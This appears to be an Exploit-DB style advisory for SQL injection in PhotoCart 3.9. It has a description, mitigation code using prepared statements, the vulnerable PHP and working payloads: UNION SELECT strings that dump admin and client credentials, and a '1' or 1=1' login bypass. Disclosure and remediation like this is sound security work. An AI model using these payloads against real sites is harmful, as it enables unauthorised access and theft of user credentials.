Vendor: PhotoCart
By: ~!Dok_tOR!~
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PhotoCart
Affected Version From: 3.9
Affected Version To: 3.9
Patch Exists: YES
Related CWE: N/A
CPE: a:picturespro:photocart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Authentication Bypass SQL Injection

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'email' and 'password' parameters to the '/_login.php' script. A remote attacker can send a specially crafted request containing SQL statements to the vulnerable script, bypass authentication, gain access to the application with administrative privileges and execute arbitrary SQL commands in the context of the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before passing to the SQL statement.
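As an added illustration (not code from PhotoCart or from the advisory author), the two user-controlled queries quoted in the raw advisory below are rebuilt with mysqli prepared statements, so the 'email', 'password', 'qtitle', 'qid' and date values are bound as data instead of being concatenated into the SQL text. The `$db` connection and the function names `find_client` and `gallery_where` are assumptions.

```php
<?php
// Added example, not PhotoCart's code: the advisory's two user-controlled
// queries rebuilt with mysqli prepared statements. $db is an assumed open
// mysqli connection; function names are hypothetical.

// _login.php: the original splices $_REQUEST['email'] and ['password']
// straight into the WHERE clause, so a quote in either field rewrites the
// query. Bound parameters travel as data and are never parsed as SQL.
function find_client(mysqli $db, string $email, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT * FROM pc_clients WHERE client_email = ? AND client_pass = ?'
    );
    $stmt->bind_param('ss', $email, $password);   // 's' = string placeholder
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// search.php: builds the WHERE clause with '?' placeholders and the values to
// bind for the three search modes the advisory quotes; the caller prepares
// 'SELECT ... ' . $sql and binds $params. The $and_expire fragment is left
// out because the advisory does not show where it comes from.
function gallery_where(array $req): array
{
    $sql    = "WHERE gal_status = '1' AND gal_client != '1'";
    $params = [];
    switch ($req['searchby'] ?? '') {
        case 'qtitle':   // wildcards go into the bound value, not the SQL
            $sql     .= ' AND gal_title LIKE ?';
            $params[] = '%' . ($req['qtitle'] ?? '') . '%';
            break;
        case 'qid':      // gal_id is numeric, so also enforce the shape
            $sql     .= ' AND gal_id = ?';
            $params[] = (int) ($req['qid'] ?? 0);
            break;
        case 'qdate':    // validate the date parts before binding them
            $y = (int) ($req['qyear'] ?? 0);
            $m = (int) ($req['qmonth'] ?? 0);
            $d = (int) ($req['qday'] ?? 0);
            if (!checkdate($m, $d, $y)) {
                throw new InvalidArgumentException('invalid search date');
            }
            $sql     .= ' AND gal_date = ?';
            $params[] = sprintf('%04d-%02d-%02d', $y, $m, $d);
            break;
    }
    return [$sql, $params];
}
```

The plaintext `client_pass` comparison is kept as in the original code; password hashing is a separate fix from the injection.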

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 18.08.08
Product: PhotoCart
Version: 3.9, possibly earlier versions too
Type: Photography Shopping Cart
URL: www.picturespro.com
Vulnerability Class: SQL Injection

/[installdir]/search.php

Vuln code:

PHP:
// Each branch concatenates a raw $_REQUEST value straight into the WHERE clause
// and also echoes it back unescaped.
if($_REQUEST['searchby'] == "qtitle") {
    $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
    print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
}
if($_REQUEST['searchby'] == "qid") {
    $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
    print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
}
if($_REQUEST['searchby'] == "qdate") {
    $gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
    $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
    print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
}


Precondition: magic_quotes_gpc = Off

Example:
http://[server]/[installdir]/search.php

Enter the following in the 'Gallery or event name' field:

Exploit 1:

' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin/*

Exploit 2:

' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,client_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from pc_clients/*


Authentication Bypass SQL Injection

/[installdir]/_login.php

Vuln code:

PHP:
// Both request parameters are concatenated straight into the query string.
$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");


Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

# milw0rm.com [2008-08-21]